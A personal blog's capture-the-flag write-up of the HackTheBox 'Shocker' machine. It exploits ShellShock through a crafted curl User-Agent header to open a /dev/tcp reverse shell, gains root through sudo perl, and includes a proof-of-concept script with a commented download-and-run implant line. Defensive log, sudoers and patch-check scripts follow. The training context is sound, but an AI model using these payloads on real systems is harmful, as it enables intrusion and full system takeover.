Bradmanfordson's Blog

Christian | Offensive Security Aficionado | Puppy Herder | Critter Catcher | Bourbon Sipper | Cigar Smoker

7 July 2021

Shocker

Difficulty: Easy
Operating System: Linux
IP Address: 10.10.10.56
Exploit: ShellShock
Escalation: sudo /usr/bin/perl


Alright! Welcome to my first writeup. ShellShock was the first vulnerability I ever exploited outside of Metasploit, so this box is super special to me. Since I’m pretty familiar with this kind of vulnerability, let’s do this entire box using ONLY the command line!

Enumeration


Let’s begin with a simple ping to see if our target responds to ICMP:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ ping 10.10.10.56
PING 10.10.10.56 (10.10.10.56) 56(84) bytes of data.
64 bytes from 10.10.10.56: icmp_seq=1 ttl=63 time=31.9 ms
64 bytes from 10.10.10.56: icmp_seq=2 ttl=63 time=32.6 ms
64 bytes from 10.10.10.56: icmp_seq=3 ttl=63 time=32.5 ms
^C
--- 10.10.10.56 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 31.864/32.323/32.616/0.328 ms

Nice! Let’s go ahead and run nmap and see what ports are open:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ nmap -p- --max-retries 1 10.10.10.56                                            
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 21:35 CDT
Nmap scan report for 10.10.10.56
Host is up (0.082s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap done: 1 IP address (1 host up) scanned in 12.96 seconds

I used a few interesting flags in that:

  1. -p-: tells nmap to scan all ports (except 0…)
  2. --max-retries 1: caps the number of port scan probe retransmissions, meaning nmap will only probe a port twice: one initial attempt and one retry. This makes the scan run faster… however, we could still miss ports.

Okay, so we found that ports 80 and 2222 are open. I’m going to target the web page first (port 80). First things first, let’s fuzz common web directories and see what we’re looking at. To do this, I’ll be using a new tool I found, Feroxbuster.

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ feroxbuster -u http://10.10.10.56:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x sh bash php -s 200 204 301

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.56:80/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ [200, 204, 301]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [sh, bash, php]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200        9l       13w      137c http://10.10.10.56/index.html
200        7l       18w        0c http://10.10.10.56/cgi-bin/user.sh
[####################] - 23s   112464/112464  0s      found:2       errors:0      
[####################] - 20s    18744/18744   931/s   http://10.10.10.56:80/
[####################] - 19s    18744/18744   939/s   http://10.10.10.56/cgi-bin/
                      

We found an interesting page: /cgi-bin/user.sh. A quick curl reveals the following:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

23:09:28 up  1:04,  0 users,  load average: 0.00, 0.00, 0.00

A good rule of thumb with /cgi-bin/[page].sh is to check for ShellShock. We can use nmap’s http-shellshock.nse script to test for it.

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ nmap -p 80 --script http-shellshock.nse --script-args uri=/cgi-bin/user.sh 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 21:37 CDT
Nmap scan report for 10.10.10.56
Host is up (0.041s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       http://seclists.org/oss-sec/2014/q3/685
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds

Well look at that, it reports vulnerable! (imagine my shock - pun 100% intended)


Exploitation


Alright, let’s just double-check and see if we can manually inject code.

First we’ll start a netcat listener using nc -lnvp 12345, then we’ll execute the following:

curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'echo BRADMAN | nc 10.10.16.192 12345'" http://10.10.10.56/cgi-bin/user.sh

Okay, okay, slow down, what the hell did I just do?

Let’s start with nc -lnvp 12345. This opens a network listener on our local machine on port 12345, meaning we are opening up that port and reporting back any connection information sent to it. We do this with the flags -lnvp:

  1. -l: listen mode for inbound connections
  2. -n: numeric IP Addresses only, no dns
  3. -v: verbose mode
  4. -p PORT: the port we’re wanting to open up, in this case: 12345

NetCat is pretty cool and lets us just string all these flags together as -lnvp or -nvlp or -vlnp or … well… you should get the idea.

Next, we need to actually exploit ShellShock - there are super good explanations online for ShellShock; this one is one of my favorites. I recommend reading through it if you’re unfamiliar with ShellShock.

So, my actual payload in the curl command is
/bin/bash -c 'echo BRADMAN | nc 10.10.16.192 12345'
What this does is echo “BRADMAN” to netcat, but instead of listening, netcat is connecting to an IP address, specifically my attacker box, on the port we opened, 12345. (The two echo commands in front of the payload print the blank line that ends the CGI response headers, so whatever the payload prints comes back in the HTTP body instead of tripping a malformed-header error.) When we execute this curl command, we get the following on our netcat listener:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ nc -lnvp 12345  
listening on [any] 12345 ...
connect to [10.10.16.192] from (UNKNOWN) [10.10.10.56] 48194
BRADMAN

NICE! We were not only able to execute code on the target machine, but actually send a message back to our attacker machine! Alright, let’s see if we can get a fully interactive reverse shell. We’ll try to get a /dev/tcp reverse shell using the following:
bash -i >& /dev/tcp/10.10.16.192/12345 0>&1
If this works, we should expect to get a fully interactive reverse shell back on our netcat listener (we’ll have to restart our netcat listener).

Exploit:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.192/12345 0>&1'" http://10.10.10.56/cgi-bin/user.sh

Shell:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ nc -lnvp 12345
listening on [any] 12345 ...
connect to [10.10.16.192] from (UNKNOWN) [10.10.10.56] 48196
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$ 
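Since that probe went straight through the User-Agent header, it also lands in the web server’s access log. Here is an added example (not part of the original writeup, and not from any tool mentioned above) of spotting ShellShock-style requests in an Apache combined-format log. The log lines are constructed, and the client addresses 10.10.16.192 and 203.0.113.7 are placeholders. It matches the function-definition marker `() {` anywhere in the line, which covers the Referer and User-Agent fields the combined format records; a probe sent in a header that isn’t logged (Cookie, for instance) would not show up here.

```shell
#!/bin/sh
# Added example (not part of the original writeup): flag ShellShock-style
# probes in an Apache "combined" access log. The combined format quotes the
# Referer and User-Agent fields at the end of each line, so a payload sent in
# either header shows up there.

# Constructed sample log (hypothetical timestamps; 203.0.113.7 is a placeholder).
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
10.10.16.192 - - [06/Jul/2021:21:45:10 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 137 "-" "() { :; }; echo; echo; /bin/bash -c 'id'"
10.10.16.192 - - [06/Jul/2021:21:45:12 -0500] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.16.192 - - [06/Jul/2021:21:45:15 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "feroxbuster/2.3.0"
203.0.113.7 - - [06/Jul/2021:22:01:03 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "() { ignored; }; echo VULNERABLE" "curl/7.74.0"
EOF

# The ShellShock trigger is a header value starting with "() {". The
# parentheses in a normal User-Agent such as "Mozilla/5.0 (X11; ...)" are
# never "()" followed by a brace, so this pattern does not match them.
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

# Print every request whose logged headers carry the marker.
shellshock_hits() {
    grep -E "$SHELLSHOCK_RE" "$1" || true
}

# Number of such requests (prints 0 when there are none, without failing).
shellshock_hit_count() {
    grep -c -E "$SHELLSHOCK_RE" "$1" || true
}

# Distinct client addresses that sent them, one per line.
shellshock_sources() {
    shellshock_hits "$1" | awk '{ print $1 }' | sort -u
}

echo "ShellShock-style requests: $(shellshock_hit_count "$SAMPLE_LOG")"
shellshock_hits "$SAMPLE_LOG"
echo "From:"
shellshock_sources "$SAMPLE_LOG"
```

Point it at a real log with shellshock_hits /var/log/apache2/access.log; the two hits in the sample are the User-Agent payload on the first line and the Referer payload on the last, while the feroxbuster and browser lines are left alone.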


Escalation


VERY NICE! Okay, we are now controlling the target machine as user shelly, whoever that is… Let’s look around and see if we can escalate our privileges to root.

shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/usr/lib/cgi-bin$ 

The first thing I always check is what the current user can run through sudo without a password. To do this, we run sudo -l; if we’re prompted for a password and we don’t know it, then we’re out of luck… however, we’re not out of luck here! We are able to run /usr/bin/perl via sudo without needing a password. Huh, a programming language that we can run as root - I wonder what we’ll be able to do with that? Maybe tell it to start a new shell?

Yup! If you don’t know immediately what to do, don’t worry about it; let’s go to GTFOBins and look up perl to see if it has anything. If we search for perl we can see that we can do a myriad of things; the one we’re most interested in is sudo. According to GTFOBins, we can run sudo perl -e 'exec "/bin/sh";' and get a shell. However, look at the results of sudo -l and you’ll see that we need a TINY adjustment: we just need to specify the full path of perl. Easy enough:

shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/bash";'
sudo /usr/bin/perl -e 'exec "/bin/bash";'
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
uname -a
Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Alright, now we’re talking. We don’t have a pretty shell but we’re root! And it was pretty easy too. And there we have it, we’ve exploited the machine and obtained root permissions, from here we can read the /home/shelly/user.txt and the /root/root.txt and get our whole 0 points from HackTheBox!

shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/bash";'
sudo /usr/bin/perl -e 'exec "/bin/bash";'
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cat /home/shelly/user.txt
13f51b<-- REDACTED -->
cat /root/root.txt  
b1fd49<-- REDACTED -->
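The lesson for whoever administers a box like this is the sudoers rule itself: a NOPASSWD grant on an interpreter is a root shell with one extra step, no matter how unprivileged the user looks. As an added example (not part of the original writeup), the script below scans a sudoers-format file for NOPASSWD entries that hand out ALL or a scripting language or editor. The sudoers content is constructed, and the users shelly, backup, deploy and ops are placeholders. The binary list is a starter list, not a complete one: GTFOBins shows that plenty of other binaries can be abused, so treat anything this prints as a definite finding and review the remaining NOPASSWD rules by hand.

```shell
#!/bin/sh
# Added example (not part of the original writeup): find NOPASSWD sudoers
# entries that grant ALL or an interpreter/editor, the class of rule that
# turned shelly into root above. Reads sudoers-format text (not "sudo -l" output).

# Constructed sample sudoers content; users and paths are placeholders.
SAMPLE_SUDOERS=$(mktemp)
trap 'rm -f "$SAMPLE_SUDOERS"' EXIT
cat > "$SAMPLE_SUDOERS" <<'EOF'
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
shelly  ALL=(root) NOPASSWD: /usr/bin/perl
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/python3
deploy  ALL=(root) NOPASSWD: /bin/systemctl restart nginx
# ops   ALL=(ALL) NOPASSWD: ALL
ops     ALL=(ALL) NOPASSWD: ALL
EOF

# Starter list of binaries that trivially spawn a shell when run as root.
# Not exhaustive (see GTFOBins): rsync and systemctl above can be abused too.
RISKY_RE='^(ALL|.*/(perl|python[0-9.]*|ruby|bash|sh|dash|zsh|vim?|less|more|awk|find|env|ed|nano))$'

# Print "user<TAB>command" for every NOPASSWD command matching RISKY_RE.
# Comment lines are skipped; each comma-separated command is judged by its
# first token, so "/bin/systemctl restart nginx" is checked as /bin/systemctl.
audit_nopasswd() {
    grep -v '^[[:space:]]*#' "$1" | grep 'NOPASSWD:' | while IFS= read -r line; do
        user=$(printf '%s\n' "$line" | awk '{ print $1 }')
        cmds=${line#*NOPASSWD:}
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            bin=$(printf '%s\n' "$cmd" | awk '{ print $1 }')
            [ -n "$bin" ] || continue
            if printf '%s\n' "$bin" | grep -qE "$RISKY_RE"; then
                printf '%s\t%s\n' "$user" "$bin"
            fi
        done
    done
}

# Convenience: number of findings.
count_risky_nopasswd() {
    audit_nopasswd "$1" | wc -l | tr -d ' '
}

audit_nopasswd "$SAMPLE_SUDOERS"
echo "findings: $(count_risky_nopasswd "$SAMPLE_SUDOERS")"
```

On a real host you would run audit_nopasswd over /etc/sudoers and each file in /etc/sudoers.d (both readable only as root). For the sample it reports shelly (perl), backup (python3) and ops (ALL); the commented-out ops line is ignored, and deploy’s systemctl rule is not flagged by this starter list even though it still deserves a look.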


Super basic POC


#!/usr/bin/bash

# Super Basic POC Exploit code for HackTheBox Shocker
# Utilizes the ShellShock exploit

# Author: Brad Roberts

if [ "$#" -lt 2 ]; then
    echo "Usage: $0 [LHOST] [LPORT]"
    exit 1
fi

LHOST=$1
LPORT=$2

TARGET="http://10.10.10.56/cgi-bin/user.sh"

PAYLOAD="/bin/bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"
# Fan of Bishop Fox and use Sliver? Build a mtls payload using `generate --os linux --mtls <your attacker ip> -N sploit`
# oh and make sure to make it world readable when you start up your webserver :)
# PAYLOAD="/bin/bash -c 'cd /tmp; curl http://${LHOST}:8080/sploit -o sploit; chmod +x sploit; /tmp/sploit &'"

curl -H "User-Agent: () { :; }; echo; echo; ${PAYLOAD}" "${TARGET}"


I’m vulnerable to ShellShock, how do I fix this?


First off, your web page might just be vulnerable to OS command injection that happens to look like ShellShock. It’s probably vulnerable, but just to be sure, double check by running the following on the server:
env val='() { :; }; echo VULNERABLE' bash -c "echo Hello World"

If you see VULNERABLE then, you guessed it…

This is a vulnerability in bash itself so to fix this, you’ll have to update bash.

Update with apt:
sudo apt-get update && sudo apt-get install --only-upgrade bash

Update with yum:
sudo yum update bash
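To turn that spot check into something you can script across a fleet, here is an added example (not from the original post) that wraps the CVE-2014-6271 probe above and adds the widely published probe for CVE-2014-7169, the follow-up bug that the first bash patch did not fully close (it is the second CVE nmap listed in its references earlier). It prints one of patched, vulnerable:CVE-2014-6271, vulnerable:CVE-2014-7169 or no-bash, and takes an optional path to the bash binary to test (default: whatever bash is on PATH). Neither probe changes anything outside a throwaway temp directory.

```shell
#!/bin/sh
# Added example (not from the original post): report whether a bash binary
# is affected by CVE-2014-6271 or the follow-up CVE-2014-7169.

shellshock_status() {
    bash_bin=${1:-bash}
    if ! command -v "$bash_bin" >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi

    # CVE-2014-6271: a function definition in an environment value followed
    # by extra commands. A patched bash never runs the trailing "echo".
    out=$(env val='() { :; }; echo VULNERABLE' "$bash_bin" -c 'echo probe' 2>/dev/null || true)
    case $out in
        *VULNERABLE*) echo "vulnerable:CVE-2014-6271"; return 0 ;;
    esac

    # CVE-2014-7169: the first patch left a parser bug that lets the pending
    # redirection in the value leak into the -c command, so an affected bash
    # runs "date > echo" and leaves a file named "echo" behind. Run it inside
    # a temp directory so nothing else is touched; a patched bash just prints
    # the word "date".
    tmpdir=$(mktemp -d)
    ( cd "$tmpdir" && env X='() { (a)=>\' "$bash_bin" -c 'echo date' >/dev/null 2>&1 ) || true
    if [ -e "$tmpdir/echo" ]; then
        rm -rf "$tmpdir"
        echo "vulnerable:CVE-2014-7169"
        return 0
    fi
    rm -rf "$tmpdir"
    echo "patched"
}

shellshock_status "$@"
```

Run it as-is after patching to confirm the upgrade took, or hand it the path of a bash that lives outside the package manager’s reach (a vendored copy in an appliance, say), which is the case the apt and yum commands above would miss.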

Good rule of thumb is to always stay up-to-date on patches!

tags: HTB